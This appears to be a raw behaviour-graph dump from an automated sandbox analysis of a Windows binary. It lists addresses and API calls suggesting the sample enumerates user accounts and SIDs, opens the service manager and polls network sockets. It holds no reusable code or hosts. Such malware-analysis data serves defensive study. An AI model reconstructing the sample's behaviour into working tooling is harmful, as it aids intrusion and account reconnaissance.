7ffda5578fc4 GetLastError 61666->61667 61668 7ffda5578f8f 61666->61668 61670 7ffda55740d2 13 API calls 61667->61670 61669 7ffda55740d2 13 API calls 61668->61669 61671 7ffda557551a 61669->61671 61672 7ffda5578fe2 61670->61672 61671->60985 61674 7ffda55717f8 InitializeCriticalSectionAndSpinCount 61671->61674 61673 7ffda55740d2 13 API calls 61672->61673 61673->61671 61703 7ffda5572732 GetLastError 61702->61703 61704 7ffda5572728 61702->61704 61705 7ffda55740d2 13 API calls 61703->61705 61706 7ffda557ce6b 61704->61706 61705->61704 61707 7ffda557ceb2 61706->61707 61708 7ffda557ce7c 61706->61708 61709 7ffda55740d2 13 API calls 61707->61709 61710 7ffda557cee2 61708->61710 61711 7ffda557ce81 61708->61711 61717 7ffda55742da 61709->61717 61712 7ffda55740d2 13 API calls 61710->61712 61713 7ffda557cf12 61711->61713 61714 7ffda557ce8a 61711->61714 61712->61717 61715 7ffda55740d2 13 API calls 61713->61715 61730 7ffda557cd2c 15 API calls 61714->61730 61715->61717 61717->61597 61717->61601 61718 7ffda557ce8f 61718->61717 61720 7ffda55740e0 61719->61720 61731 7ffda557eea0 61720->61731 61730->61718 61732 7ffda557eeae 61731->61732 61733 7ffda557eec5 61731->61733 61740 7ffda5574e41 61739->61740 61741 7ffda5574e79 61739->61741 61747 7ffda5574b19 61740->61747 61743 7ffda55740d2 13 API calls 61741->61743 61745 7ffda5574e58 61743->61745 61745->61619 61745->61620 61748 7ffda5574b31 61747->61748 61749 7ffda5574b4c 61747->61749 61751 7ffda5574b7f 61748->61751 61752 7ffda5574b36 61748->61752 61750 7ffda55740d2 13 API calls 61749->61750 61757 7ffda5574b75 61750->61757 61753 7ffda55740d2 13 API calls 61751->61753 61754 7ffda5574bb2 61752->61754 61761 7ffda5574b3b 61752->61761 61753->61757 61755 7ffda55740d2 13 API calls 61754->61755 61755->61757 61756 7ffda5574c1c 61756->61757 61759 7ffda5574c23 61756->61759 61760 7ffda55740d2 13 API calls 61757->61760 61758 7ffda5574bf1 strcmp 61758->61761 61763 7ffda5574c39 61760->61763 61761->61756 61761->61758 61763->61745 61782 7ffda5572a42 LoadLibraryA 61781->61782 61783 7ffda5572a6b 61781->61783 61784 7ffda5572a50 61782->61784 61785 7ffda5572a6e GetLastError 61782->61785 61783->61785 61786 7ffda55740d2 13 API calls 61784->61786 61787 7ffda55740d2 13 API calls 61785->61787 61788 7ffda5572120 61786->61788 61787->61788 61825 7ffda55aca2a 61824->61825 61826 7ffda55acb50 GetLastError 61824->61826 61949 7ffda55ab930 GetModuleHandleExA 61825->61949 61828 7ffda55ac852 13 API calls 61826->61828 61835 7ffda55acb29 61828->61835 61832 7ffda55aca64 strlen 61833 7ffda55aca7d 61832->61833 61834 7ffda55aca93 61832->61834 61833->61834 61837 7ffda55aca82 strlen 61833->61837 61838 7ffda55acab8 strlen fopen 61834->61838 61839 7ffda55aca98 strcat strlen 61834->61839 61836 7ffda55ac852 13 API calls 61835->61836 61840 7ffda55acb46 61836->61840 61837->61834 61841 7ffda55acb07 61838->61841 61842 7ffda55acc1d 61838->61842 61839->61838 61840->60989 61848 7ffda55ad824 61840->61848 61966 7ffda55ac852 61841->61966 61843 7ffda55ac852 13 API calls 61842->61843 61843->61835 61849 7ffda55ad846 61848->61849 61850 7ffda55ad889 61848->61850 61986 7ffda55ad490 61849->61986 61852 7ffda55ac852 13 API calls 61850->61852 61853 7ffda55ad85f 61852->61853 61853->61002 61858 7ffda55ac25c 61853->61858 61855 7ffda55ad8b9 _errno _strtoui64 _errno 61855->61853 61856 7ffda55ad8ec _errno 61855->61856 61857 7ffda55ac852 13 API calls 61856->61857 61857->61853 62028 7ffda55abc64 61858->62028 61894 7ffda55a8be6 GetLastError 61893->61894 61895 7ffda55a8b7e OpenSCManagerA 61893->61895 61896 7ffda55ac852 13 API calls 61894->61896 61897 7ffda55a8cbe GetLastError 61895->61897 61898 7ffda55a8bb4 61895->61898 61900 7ffda55a8bc1 61896->61900 61901 7ffda55ac852 13 API calls 61897->61901 61899 7ffda55a8cda 61898->61899 61898->61900 61903 7ffda55ac852 13 API calls 61899->61903 61902 7ffda55ac852 13 API calls 61900->61902 61901->61899 61904 7ffda55a8bde 61902->61904 61903->61904 61904->61002 61905 7ffda55ab87e WSAStartup 61904->61905 61906 7ffda55ab89a 61905->61906 61907 7ffda55ab8c2 61905->61907 61909 7ffda55ac852 13 API calls 61906->61909 61908 7ffda55ac852 13 API calls 61907->61908 61950 7ffda55ab958 61949->61950 61951 7ffda55ab962 GetLastError 61949->61951 61953 7ffda55a466b 61950->61953 61952 7ffda55ac852 13 API calls 61951->61952 61952->61950 61954 7ffda55a467c 61953->61954 61955 7ffda55a46b2 61953->61955 61956 7ffda55a46e2 61954->61956 61957 7ffda55a4681 61954->61957 61958 7ffda55ac852 13 API calls 61955->61958 61961 7ffda55ac852 13 API calls 61956->61961 61959 7ffda55a468a 61957->61959 61960 7ffda55a4712 61957->61960 61965 7ffda55a4697 61958->61965 61977 7ffda55a452c 15 API calls 61959->61977 61962 7ffda55ac852 13 API calls 61960->61962 61961->61965 61962->61965 61964 7ffda55a468f 61964->61965 61965->61832 61965->61835 61967 7ffda55ac860 61966->61967 61978 7ffda55b0ac0 61967->61978 61977->61964 61979 7ffda55b0ae5 61978->61979 61980 7ffda55b0ace 61978->61980 61987 7ffda55ad4d9 61986->61987 61988 7ffda55ad4a1 61986->61988 61990 7ffda55ac852 13 API calls 61987->61990 61994 7ffda55ad179 61988->61994 61992 7ffda55ad4b8 61990->61992 61992->61853 61992->61855 61995 7ffda55ad1ac 61994->61995 61996 7ffda55ad191 61994->61996 61999 7ffda55ac852 13 API calls 61995->61999 61997 7ffda55ad196 61996->61997 61998 7ffda55ad1df 61996->61998 62000 7ffda55ad212 61997->62000 62008 7ffda55ad19b 61997->62008 62001 7ffda55ac852 13 API calls 61998->62001 62004 7ffda55ad1d5 61999->62004 62002 7ffda55ac852 13 API calls 62000->62002 62001->62004 62002->62004 62003 7ffda55ad27c 62003->62004 62006 7ffda55ad283 62003->62006 62007 7ffda55ac852 13 API calls 62004->62007 62005 7ffda55ad251 strcmp 62005->62008 62010 7ffda55ad299 62007->62010 62008->62003 62008->62005 62010->61992 62029 7ffda55abc9b 62028->62029 62030 7ffda55abc72 LoadLibraryA 62028->62030 62032 7ffda55abc9e GetLastError 62029->62032 62031 7ffda55abc80 62030->62031 62030->62032 62034 7ffda55ac852 13 API calls 62031->62034 62033 7ffda55ac852 13 API calls 62032->62033 62035 7ffda55abc99 62033->62035 62034->62035 62072 7ffda5ba224a 62071->62072 62073 7ffda5ba2370 GetLastError 62071->62073 62177 7ffda5ba4e20 GetModuleHandleExA 62072->62177 62075 7ffda5ba2072 16 API calls 62073->62075 62080 7ffda5ba2349 62075->62080 62079 7ffda5ba2284 strlen 62082 7ffda5ba229d 62079->62082 62083 7ffda5ba22b3 62079->62083 62081 7ffda5ba2072 16 API calls 62080->62081 62084 7ffda5ba2366 62081->62084 62082->62083 62085 7ffda5ba22a2 strlen 62082->62085 62086 7ffda5ba22d8 strlen fopen 62083->62086 62087 7ffda5ba22b8 strcat strlen 62083->62087 62084->61006 62095 7ffda5ba1d84 62084->62095 62085->62083 62088 7ffda5ba2327 62086->62088 62089 7ffda5ba243d 62086->62089 62087->62086 62194 7ffda5ba2072 62088->62194 62091 7ffda5ba2072 16 API calls 62089->62091 62091->62080 62096 7ffda5ba1da6 62095->62096 62097 7ffda5ba1de9 62095->62097 62214 7ffda5ba19f0 62096->62214 62099 7ffda5ba2072 16 API calls 62097->62099 62104 7ffda5ba1dbf 62099->62104 62101 7ffda5ba1e19 _errno _strtoui64 _errno 62102 7ffda5ba1e4c _errno 62101->62102 62101->62104 62103 7ffda5ba2072 16 API calls 62102->62103 62103->62104 62104->61013 62105 7ffda5ba482c 62104->62105 62256 7ffda5ba5154 62105->62256 62139 7ffda5ba32aa 62138->62139 62140 7ffda5ba32d2 62138->62140 62142 7ffda5ba2072 16 API calls 62139->62142 62141 7ffda5ba2072 16 API calls 62140->62141 62144 7ffda5ba32eb 62141->62144 62143 7ffda5ba32c4 62142->62143 62143->61011 62145 7ffda5ba2072 16 API calls 62144->62145 62145->62143 62147 7ffda5ba3ad0 InitializeCriticalSectionAndSpinCount 62146->62147 62148 7ffda5ba3c52 GetLastError 62146->62148 62149 7ffda5ba3d6e GetLastError 62147->62149 62150 7ffda5ba3afd 62147->62150 62151 7ffda5ba2072 16 API calls 62148->62151 62152 7ffda5ba2072 16 API calls 62149->62152 62153 7ffda5ba3b13 CreateThread 62150->62153 62168 7ffda5ba3d8c 62150->62168 62161 7ffda5ba3c70 62151->62161 62152->62168 62161->62149 62178 7ffda5ba2266 62177->62178 62179 7ffda5ba4e52 GetLastError 62177->62179 62181 7ffda5ba859b 62178->62181 62180 7ffda5ba2072 16 API calls 62179->62180 62180->62178 62182 7ffda5ba85ac 62181->62182 62183 7ffda5ba85e2 62181->62183 62184 7ffda5ba85b1 62182->62184 62185 7ffda5ba8612 62182->62185 62186 7ffda5ba2072 16 API calls 62183->62186 62187 7ffda5ba85ba 62184->62187 62188 7ffda5ba8642 62184->62188 62189 7ffda5ba2072 16 API calls 62185->62189 62192 7ffda5ba227a 62186->62192 62205 7ffda5ba845c 18 API calls 62187->62205 62190 7ffda5ba2072 16 API calls 62188->62190 62189->62192 62190->62192 62192->62079 62192->62080 62193 7ffda5ba85bf 62193->62192 62195 7ffda5ba2080 62194->62195 62206 7ffda5bab130 62195->62206 62205->62193 62207 7ffda5bab155 62206->62207 62208 7ffda5bab13e 62206->62208 62212 7ffda5bac190 11 API calls 62208->62212 62215 7ffda5ba1a39 62214->62215 62216 7ffda5ba1a01 62214->62216 62218 7ffda5ba2072 16 API calls 62215->62218 62222 7ffda5ba16d9 62216->62222 62220 7ffda5ba1a18 62218->62220 62220->62101 62220->62104 62223 7ffda5ba170c 62222->62223 62224 7ffda5ba16f1 62222->62224 62227 7ffda5ba2072 16 API calls 62223->62227 62225 7ffda5ba16f6 62224->62225 62226 7ffda5ba173f 62224->62226 62229 7ffda5ba1772 62225->62229 62236 7ffda5ba16fb 62225->62236 62228 7ffda5ba2072 16 API calls 62226->62228 62232 7ffda5ba1735 62227->62232 62228->62232 62230 7ffda5ba2072 16 API calls 62229->62230 62230->62232 62231 7ffda5ba17dc 62231->62232 62234 7ffda5ba17e3 62231->62234 62235 7ffda5ba2072 16 API calls 62232->62235 62233 7ffda5ba17b1 strcmp 62233->62236 62237 7ffda5ba2072 16 API calls 62234->62237 62238 7ffda5ba17f9 62235->62238 62236->62231 62236->62233 62237->62238 62238->62220 62257 7ffda5ba518b 62256->62257 62258 7ffda5ba5162 LoadLibraryA 62256->62258 62259 7ffda5ba518e GetLastError 62257->62259 62258->62259 62260 7ffda5ba5170 62258->62260 62261 7ffda5ba2072 16 API calls 62259->62261 62262 7ffda5ba2072 16 API calls 62260->62262 62263 7ffda5ba4840 62261->62263 62262->62263 62300 7ffdac0f152a 62299->62300 62301 7ffdac0f1650 GetLastError 62299->62301 62404 7ffdac0f3a80 GetModuleHandleExA 62300->62404 62303 7ffdac0f1352 16 API calls 62301->62303 62308 7ffdac0f1629 62303->62308 62307 7ffdac0f1564 strlen 62310 7ffdac0f1593 62307->62310 62311 7ffdac0f157d 62307->62311 62309 7ffdac0f1352 16 API calls 62308->62309 62314 7ffdac0f12a2 62309->62314 62312 7ffdac0f15b8 strlen fopen 62310->62312 62313 7ffdac0f1598 strcat strlen 62310->62313 62311->62310 62315 7ffdac0f1582 strlen 62311->62315 62316 7ffdac0f1607 62312->62316 62317 7ffdac0f171d 62312->62317 62313->62312 62314->61017 62323 7ffdac0f2324 62314->62323 62315->62310 62421 7ffdac0f1352 62316->62421 62319 7ffdac0f1352 16 API calls 62317->62319 62319->62308 62324 7ffdac0f2389 62323->62324 62325 7ffdac0f2346 62323->62325 62327 7ffdac0f1352 16 API calls 62324->62327 62441 7ffdac0f1f90 62325->62441 62328 7ffdac0f12e1 62327->62328 62328->61019 62333 7ffdac0f348c 62328->62333 62330 7ffdac0f23b9 _errno _strtoui64 _errno 62330->62328 62331 7ffdac0f23ec _errno 62330->62331 62332 7ffdac0f1352 16 API calls 62331->62332 62332->62328 62483 7ffdac0f3db4 62333->62483 62369 7ffdac0f4b7a 62368->62369 62370 7ffdac0f4ba2 62368->62370 62372 7ffdac0f1352 16 API calls 62369->62372 62371 7ffdac0f1352 16 API calls 62370->62371 62373 7ffdac0f4bbb 62371->62373 62375 7ffdac0f4b94 62372->62375 62374 7ffdac0f1352 16 API calls 62373->62374 62374->62375 62375->61023 62377 7ffdac0f2c1b GetLastError 62376->62377 62378 7ffdac0f2b9d CreateThread 62376->62378 62380 7ffdac0f1352 16 API calls 62377->62380 62379 7ffdac0f2cf3 GetLastError 62378->62379 62384 7ffdac0f2be9 62378->62384 62381 7ffdac0f1352 16 API calls 62379->62381 62383 7ffdac0f2bf6 62380->62383 62381->62384 62382 7ffdac0f2dec 62384->62382 62384->62383 62405 7ffdac0f3ab2 GetLastError 62404->62405 62407 7ffdac0f1546 62404->62407 62406 7ffdac0f1352 16 API calls 62405->62406 62406->62407 62408 7ffdac0f7feb 62407->62408 62409 7ffdac0f7ffc 62408->62409 62410 7ffdac0f8032 62408->62410 62412 7ffdac0f8062 62409->62412 62413 7ffdac0f8001 62409->62413 62411 7ffdac0f1352 16 API calls 62410->62411 62417 7ffdac0f155a 62411->62417 62414 7ffdac0f1352 16 API calls 62412->62414 62415 7ffdac0f800a 62413->62415 62416 7ffdac0f8092 62413->62416 62414->62417 62432 7ffdac0f7eac 18 API calls 62415->62432 62418 7ffdac0f1352 16 API calls 62416->62418 62417->62307 62417->62308 62418->62417 62420 7ffdac0f800f 62420->62417 62422 7ffdac0f1360 62421->62422 62433 7ffdac0fd0c0 62422->62433 62432->62420 62434 7ffdac0fd0e5 62433->62434 62435 7ffdac0fd0ce 62433->62435 62442 7ffdac0f1fd9 62441->62442 62443 7ffdac0f1fa1 62441->62443 62444 7ffdac0f1352 16 API calls 62442->62444 62449 7ffdac0f1c79 62443->62449 62446 7ffdac0f1fb8 62444->62446 62446->62328 62446->62330 62450 7ffdac0f1cac 62449->62450 62451 7ffdac0f1c91 62449->62451 62454 7ffdac0f1352 16 API calls 62450->62454 62452 7ffdac0f1c96 62451->62452 62453 7ffdac0f1cdf 62451->62453 62455 7ffdac0f1d12 62452->62455 62462 7ffdac0f1c9b 62452->62462 62456 7ffdac0f1352 16 API calls 62453->62456 62460 7ffdac0f1cd5 62454->62460 62457 7ffdac0f1352 16 API calls 62455->62457 62456->62460 62457->62460 62458 7ffdac0f1d7c 62459 7ffdac0f1d83 62458->62459 62458->62460 62464 7ffdac0f1352 16 API calls 62460->62464 62461 7ffdac0f1d51 strcmp 62461->62462 62462->62458 62462->62461 62465 7ffdac0f1d99 62464->62465 62465->62446 62466 7ffdac0f1e00 62465->62466 62484 7ffdac0f3deb 62483->62484 62485 7ffdac0f3dc2 LoadLibraryA 62483->62485 62486 7ffdac0f3dee GetLastError 62484->62486 62485->62486 62487 7ffdac0f3dd0 62485->62487 62488 7ffdac0f1352 16 API calls 62486->62488 62489 7ffdac0f1352 16 API calls 62487->62489 62490 7ffdac0f34a0 62488->62490 62489->62490 62527 7ff70cadaa85 62526->62527 62528 7ff70cadaa6e 62526->62528 62533 7ff70cadbac0 fputc 62527->62533 62532 7ff70cadbac0 fputc 62528->62532 62531 7ff70cad2f59 62531->60488 62531->60489 62531->60490 62532->62531 62533->62531 62534 7ffdac0f26da 62537 7ffdac0f26e5 62534->62537 62535 7ffdac0f27ee 62536 7ffdac0f27fb 62535->62536 62593 7ffdac0f4055 20 API calls 62535->62593 62537->62535 62538 7ffdac0f270d Sleep 62537->62538 62542 7ffdac0f27c2 Sleep 62537->62542 62543 7ffdac0f4055 20 API calls 62537->62543 62545 7ffdac0f27ae memcpy 62537->62545 62546 7ffdac0f42ec socket 62537->62546 62581 7ffdac0f479a 62537->62581 62592 7ffdac0f2610 19 API calls 62537->62592 62538->62537 62542->62537 62543->62537 62545->62537 62547 7ffdac0f44eb WSAGetLastError 62546->62547 62548 7ffdac0f4323 62546->62548 62549 7ffdac0f1352 16 API calls 62547->62549 62550 7ffdac0f4327 62548->62550 62551 7ffdac0f4345 62548->62551 62552 7ffdac0f450f 62549->62552 62594 7ffdac0f3f89 62550->62594 62553 7ffdac0f3f89 18 API calls 62551->62553 62555 7ffdac0f4519 62552->62555 62567 7ffdac0f435f 62552->62567 62558 7ffdac0f4343 62553->62558 62556 7ffdac0f1352 16 API calls 62555->62556 62563 7ffdac0f4380 62556->62563 62557 7ffdac0f4357 62611 7ffdac0f4055 20 API calls 62557->62611 62558->62557 62607 7ffdac0f40ba setsockopt 62558->62607 62559 7ffdac0f1352 16 API calls 62559->62563 62561 7ffdac0f439e 62561->62557 62566 7ffdac0f43a3 htonl htons connect 62561->62566 62563->62537 62568 7ffdac0f43fc WSAGetLastError 62566->62568 62569 7ffdac0f43e1 62566->62569 62567->62559 62571 7ffdac0f440d 62568->62571 62572 7ffdac0f44be WSAGetLastError 62568->62572 62570 7ffdac0f3f89 18 API calls 62569->62570 62573 7ffdac0f43ee 62570->62573 62571->62557 62574 7ffdac0f4415 select 62571->62574 62575 7ffdac0f1352 16 API calls 62572->62575 62573->62552 62573->62557 62576 7ffdac0f4476 62574->62576 62577 7ffdac0f44a0 62574->62577 62575->62557 62576->62569 62578 7ffdac0f447c WSAGetLastError 62576->62578 62579 7ffdac0f1352 16 API calls 62577->62579 62580 7ffdac0f1352 16 API calls 62578->62580 62579->62557 62580->62557 62582 7ffdac0f4828 62581->62582 62583 7ffdac0f47b4 62581->62583 62584 7ffdac0f1352 16 API calls 62582->62584 62583->62582 62585 7ffdac0f47b9 recv 62583->62585 62588 7ffdac0f47d3 62584->62588 62586 7ffdac0f47dc WSAGetLastError 62585->62586 62587 7ffdac0f47cf 62585->62587 62586->62588 62589 7ffdac0f47f0 62586->62589 62587->62588 62591 7ffdac0f1352 16 API calls 62587->62591 62588->62537 62590 7ffdac0f1352 16 API calls 62589->62590 62590->62588 62591->62588 62592->62537 62593->62536 62595 7ffdac0f3f99 ioctlsocket 62594->62595 62597 7ffdac0f3fcd WSAGetLastError 62595->62597 62599 7ffdac0f3fbc 62595->62599 62598 7ffdac0f1352 16 API calls 62597->62598 62598->62599 62599->62561 62600 7ffdac0f3ed4 setsockopt 62599->62600 62601 7ffdac0f3f09 setsockopt 62600->62601 62602 7ffdac0f3f64 WSAGetLastError 62600->62602 62604 7ffdac0f3f3f WSAGetLastError 62601->62604 62606 7ffdac0f3f35 62601->62606 62603 7ffdac0f1352 16 API calls 62602->62603 62603->62606 62605 7ffdac0f1352 16 API calls 62604->62605 62605->62606 62606->62558 62608 7ffdac0f40f7 62607->62608 62609 7ffdac0f4101 WSAGetLastError 62607->62609 62608->62561 62610 7ffdac0f1352 16 API calls 62609->62610 62610->62608 62611->62567 62612 7ffda5ba378b 62613 7ffda5ba379d 62612->62613 62614 7ffda5ba3919 62613->62614 62616 7ffda5ba37de Sleep SleepEx 62613->62616 62617 7ffda5ba3862 GetProcessHeap HeapAlloc 62613->62617 62625 7ffda5ba2eca 62613->62625 62616->62613 62618 7ffda5ba3889 memcpy 62617->62618 62619 7ffda5ba37fb 62617->62619 62620 7ffda5ba2072 16 API calls 62618->62620 62619->62613 62621 7ffda5ba2072 16 API calls 62619->62621 62623 7ffda5ba3821 LeaveCriticalSection 62619->62623 62624 7ffda5ba3837 memcpy 62619->62624 62622 7ffda5ba38e9 EnterCriticalSection 62620->62622 62621->62619 62622->62619 62623->62619 62624->62613 62626 7ffda5ba2f58 62625->62626 62627 7ffda5ba2ee4 62625->62627 62628 7ffda5ba2072 16 API calls 62626->62628 62627->62626 62629 7ffda5ba2ee9 recv 62627->62629 62632 7ffda5ba2f03 62628->62632 62630 7ffda5ba2f0c WSAGetLastError 62629->62630 62631 7ffda5ba2eff 62629->62631 62630->62632 62633 7ffda5ba2f20 62630->62633 62631->62632 62635 7ffda5ba2072 16 API calls 62631->62635 62632->62613 62634 7ffda5ba2072 16 API calls 62633->62634 62634->62632 62635->62632 62636 7ffda5577174 62669 7ffda5576da3 62636->62669 62637 7ffda55771c3 wcslen GetProcessHeap HeapAlloc 62637->62669 62638 7ffda5577283 NetApiBufferFree 62641 7ffda5577273 62638->62641 62639 7ffda5577234 GetProcessHeap HeapAlloc 62642 7ffda5577258 62639->62642 62639->62669 62640 7ffda55773c3 62643 7ffda55773cc 62640->62643 62644 7ffda5577409 62640->62644 62641->62638 62641->62640 62645 7ffda55772a6 NetUserEnum 62641->62645 62653 7ffda5577322 GetProcessHeap HeapAlloc 62641->62653 62647 7ffda55740d2 13 API calls 62642->62647 62642->62669 62648 7ffda557751a 62643->62648 62650 7ffda55773d4 62643->62650 62649 7ffda55740d2 13 API calls 62644->62649 62645->62641 62646 7ffda5576dce LocalAlloc 62646->62669 62647->62642 62652 7ffda55740d2 13 API calls 62648->62652 62649->62650 62683 7ffda5576c7f 62650->62683 62656 7ffda55773f6 62652->62656 62657 7ffda5576d83 62653->62657 62658 7ffda557735c 62653->62658 62654 7ffda5576ded wcsncpy 62680 7ffda55793ef 62654->62680 62657->62641 62663 7ffda55740d2 13 API calls 62657->62663 62659 7ffda55773a1 62658->62659 62660 7ffda5577368 memcpy GetProcessHeap HeapFree 62658->62660 62660->62659 62662 7ffda55740d2 13 API calls 62662->62656 62663->62657 62665 7ffda5576ebe GetLastError 62668 7ffda5576ee1 LocalAlloc 62665->62668 62665->62669 62666 7ffda5577070 ConvertSidToStringSidA 62666->62669 62671 7ffda55770c1 GetLastError 62666->62671 62667 7ffda5576e75 GetLastError 62674 7ffda55740d2 13 API calls 62667->62674 62672 7ffda5576eff LookupAccountNameW 62668->62672 62673 7ffda5577066 62668->62673 62669->62637 62669->62639 62669->62641 62669->62646 62669->62654 62669->62666 62669->62667 62670 7ffda55740d2 13 API calls 62669->62670 62670->62669 62677 7ffda55740d2 13 API calls 62671->62677 62675 7ffda5576f33 LocalFree 62672->62675 62676 7ffda5576f41 GetLastError 62672->62676 62673->62666 62674->62669 62675->62669 62678 7ffda55740d2 13 API calls 62676->62678 62677->62669 62679 7ffda5576f5f 62678->62679 62679->62675 62681 7ffda5579417 wcslen 62680->62681 62682 7ffda5576e17 LookupAccountNameW 62680->62682 62681->62682 62682->62665 62682->62669 62684 7ffda5576d44 62683->62684 62689 7ffda5576c92 62683->62689 62684->62662 62685 7ffda5576d21 62685->62684 62686 7ffda5576d2d GetProcessHeap HeapFree 62685->62686 62686->62684 62687 7ffda5576ccd GetProcessHeap HeapFree 62687->62689 62688 7ffda5576cf2 GetProcessHeap HeapFree 62688->62689 62689->62685 62689->62687 62689->62688 62690 7ffda5576c9d LocalFree 62689->62690 62691 7ffda5576d19 LocalFree 62689->62691 62690->62689 62691->62689 62692 7ffda55d135a 62700 7ffda55d1365 62692->62700 62693 7ffda55d146e 62694 7ffda55d147b 62693->62694 62759 7ffda55d1e65 10 API calls 62693->62759 62695 7ffda55d138d Sleep 62695->62700 62698 7ffda55d1e65 10 API calls 62698->62700 62700->62693 62700->62695 62700->62698 62701 7ffda55d1442 Sleep 62700->62701 62703 7ffda55d142e memcpy 62700->62703 62704 7ffda55d20fc socket 62700->62704 62739 7ffda55d25aa 62700->62739 62750 7ffda55d1290 62700->62750 62701->62700 62703->62700 62705 7ffda55d22fb WSAGetLastError 62704->62705 62706 7ffda55d2133 62704->62706 62709 7ffda55d9dc2 6 API calls 62705->62709 62707 7ffda55d2155 62706->62707 62708 7ffda55d2137 62706->62708 62711 7ffda55d1d99 8 API calls 62707->62711 62760 7ffda55d1d99 62708->62760 62710 7ffda55d231f 62709->62710 62713 7ffda55d2329 62710->62713 62714 7ffda55d216f 62710->62714 62715 7ffda55d2153 62711->62715 62717 7ffda55d9dc2 6 API calls 62713->62717 62719 7ffda55d9dc2 6 API calls 62714->62719 62718 7ffda55d2167 62715->62718 62773 7ffda55d1eca setsockopt 62715->62773 62721 7ffda55d2190 62717->62721 62777 7ffda55d1e65 10 API calls 62718->62777 62719->62721 62720 7ffda55d21ae 62720->62718 62724 7ffda55d21b3 htonl htons connect 62720->62724 62721->62700 62726 7ffda55d220c WSAGetLastError 62724->62726 62727 7ffda55d21f1 62724->62727 62728 7ffda55d221d 62726->62728 62729 7ffda55d22ce WSAGetLastError 62726->62729 62730 7ffda55d1d99 8 API calls 62727->62730 62728->62718 62731 7ffda55d2225 select 62728->62731 62732 7ffda55d9dc2 6 API calls 62729->62732 62733 7ffda55d21fe 62730->62733 62734 7ffda55d2286 62731->62734 62735 7ffda55d22b0 62731->62735 62732->62718 62733->62710 62733->62718 62734->62727 62736 7ffda55d228c WSAGetLastError 62734->62736 62737 7ffda55d9dc2 6 API calls 62735->62737 62738 7ffda55d9dc2 6 API calls 62736->62738 62737->62718 62738->62718 62740 7ffda55d2638 62739->62740 62741 7ffda55d25c4 62739->62741 62742 7ffda55d9dc2 6 API calls 62740->62742 62741->62740 62743 7ffda55d25c9 recv 62741->62743 62749 7ffda55d25e3 62742->62749 62744 7ffda55d25ec WSAGetLastError 62743->62744 62745 7ffda55d25df 62743->62745 62746 7ffda55d2600 62744->62746 62744->62749 62747 7ffda55d9dc2 6 API calls 62745->62747 62745->62749 62748 7ffda55d9dc2 6 API calls 62746->62748 62747->62749 62748->62749 62749->62700 62751 7ffda55d12a8 62750->62751 62752 7ffda55d1352 62750->62752 62751->62752 62778 7ffda55d8e15 62751->62778 62752->62700 62755 7ffda55d1344 LeaveCriticalSection 62755->62752 62756 7ffda55d12d8 62756->62755 62757 7ffda55d9dc2 6 API calls 62756->62757 62781 7ffda55d9d36 62756->62781 62757->62756 62759->62694 62761 7ffda55d1da9 ioctlsocket 62760->62761 62763 7ffda55d1dcc 62761->62763 62764 7ffda55d1ddd WSAGetLastError 62761->62764 62763->62720 62766 7ffda55d1ce4 setsockopt 62763->62766 62765 7ffda55d9dc2 6 API calls 62764->62765 62765->62763 62767 7ffda55d1d19 setsockopt 62766->62767 62768 7ffda55d1d74 WSAGetLastError 62766->62768 62769 7ffda55d1d45 62767->62769 62770 7ffda55d1d4f WSAGetLastError 62767->62770 62771 7ffda55d9dc2 6 API calls 62768->62771 62769->62715 62772 7ffda55d9dc2 6 API calls 62770->62772 62771->62769 62772->62769 62774 7ffda55d1f07 62773->62774 62775 7ffda55d1f11 WSAGetLastError 62773->62775 62774->62720 62776 7ffda55d9dc2 6 API calls 62775->62776 62776->62774 62777->62714 62779 7ffda55d8e2b GetSystemTimeAsFileTime 62778->62779 62780 7ffda55d12bb EnterCriticalSection 62778->62780 62779->62780 62780->62756 62782 7ffda55d9d62 62781->62782 62785 7ffda55d9d81 62781->62785 62783 7ffda55d9d6c 62782->62783 62784 7ffda55d9d9f 62782->62784 62787 7ffda55d9d8a 62783->62787 62788 7ffda55d9d6e 62783->62788 62800 7ffda55d99b3 23 API calls 62784->62800 62785->62756 62787->62785 62795 7ffda55d9752 62787->62795 62789 7ffda55d9d75 62788->62789 62790 7ffda55d9d98 62788->62790 62789->62785 62798 7ffda55d9add 45 API calls 62789->62798 62799 7ffda55d9760 25 API calls 62790->62799 62793 7ffda55d9d9d 62793->62785 62801 7ffda55d9510 62795->62801 62798->62785 62799->62793 62800->62785 62830 7ffda55d3f5b 62801->62830 62804 7ffda55d4ac0 8 API calls 62805 7ffda55d9586 62804->62805 62806 7ffda55d89db 8 API calls 62805->62806 62807 7ffda55d9598 62806->62807 62808 7ffda55d9699 62807->62808 62809 7ffda55d95a2 strlen 62807->62809 62815 7ffda55d971b 62808->62815 62825 7ffda55d9537 62808->62825 62861 7ffda55d5bf3 62808->62861 62886 7ffda55d542f 38 API calls 62808->62886 62887 7ffda55d4e60 20 API calls 62808->62887 62888 7ffda55d4fe9 66 API calls 62808->62888 62810 7ffda55d95b9 62809->62810 62811 7ffda55d95cf strlen 62809->62811 62810->62811 62812 7ffda55d95be strlen 62810->62812 62833 7ffda55d82d7 62811->62833 62812->62811 62889 7ffda55d5bd8 FindClose 62815->62889 62816 7ffda55d9601 62820 7ffda55d9609 strlen 62816->62820 62816->62825 62821 7ffda55d9636 strcpy strlen strlen strlen 62820->62821 62822 7ffda55d9620 62820->62822 62821->62808 62822->62821 62823 7ffda55d9625 strlen 62822->62823 62823->62821 62825->62785 62826 7ffda55d9727 62826->62825 62827 7ffda55d3f5b 2 API calls 62826->62827 62827->62825 62831 7ffda55d3f66 62830->62831 62832 7ffda55d3f71 QueryPerformanceFrequency QueryPerformanceCounter 62830->62832 62831->62804 62831->62825 62832->62831 62834 7ffda55d82f5 62833->62834 62835 7ffda55d82e0 GetFileAttributesA 62833->62835 62837 7ffda55d9dc2 6 API calls 62834->62837 62836 7ffda55d8325 GetLastError 62835->62836 62838 7ffda55d82eb 62835->62838 62836->62838 62837->62838 62838->62816 62839 7ffda55d5e9e 62838->62839 62840 7ffda55d5ef8 62839->62840 62841 7ffda55d5ebd strlen 62839->62841 62843 7ffda55d9dc2 6 API calls 62840->62843 62842 7ffda55d5ece 62841->62842 62854 7ffda55d5ee9 62841->62854 62844 7ffda55d5f76 strcpy strlen 62842->62844 62845 7ffda55d5ed7 CreateDirectoryA 62842->62845 62843->62854 62846 7ffda55d5fae strlen 62844->62846 62856 7ffda55d5f55 62844->62856 62847 7ffda55d5f30 GetLastError 62845->62847 62845->62854 62846->62856 62849 7ffda55d9dc2 6 API calls 62847->62849 62848 7ffda55d5f9d strlen 62848->62846 62849->62856 62850 7ffda55d60e9 62855 7ffda55d9dc2 6 API calls 62850->62855 62851 7ffda55d6160 62852 7ffda55d9dc2 6 API calls 